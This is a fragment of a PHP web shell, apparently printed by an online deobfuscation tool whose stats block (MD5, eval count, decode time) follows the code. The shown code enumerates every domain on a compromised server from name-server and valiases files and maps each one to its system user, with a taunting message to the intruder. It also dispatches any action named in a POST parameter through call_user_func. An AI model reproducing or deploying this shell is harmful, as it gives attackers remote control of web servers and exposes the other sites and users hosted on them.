echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>User</td></tr>";
}
}
echo "</table>";
}else{
$count = 1;
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2> There are( <b>" . count($domains) . "</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr>
<tr><td>No</td><td>Domain</td><td>User</td></tr>";
foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>".$user['name']."</td></tr>";
}
}
printFooter();
}
if( empty($_POST['a']) )
if(isset($default_action) && function_exists('action' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a'])
?>
Function Calls
| None |
Stats
| MD5 | 7efb58d29ee6989c001495f5bd0e81c3 |
| Eval Count | 0 |
| Decode Time | 116 ms |